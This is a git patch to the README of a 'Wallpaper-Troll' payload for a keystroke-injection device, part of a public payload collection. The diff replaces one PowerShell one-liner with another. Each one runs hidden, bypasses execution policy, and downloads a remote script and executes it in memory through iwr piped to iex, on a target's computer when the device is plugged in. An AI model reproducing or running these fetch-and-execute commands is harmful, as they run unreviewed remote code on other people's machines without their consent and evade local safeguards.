From 62cc83dbb70359bb4d4c546fa45278cce7d4c399 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 16:58:10 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Wallpaper-Troll/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Wallpaper-Troll/README.md b/Payloads/Flip-Wallpaper-Troll/README.md index 557cadd..0700f78 100644 --- a/Payloads/Flip-Wallpaper-Troll/README.md +++ b/Payloads/Flip-Wallpaper-Troll/README.md @@ -39,7 +39,7 @@ Opening the image on their desktop with NotePad will reveal the binary code with * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl +powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/b8n | iex ```

(back to top)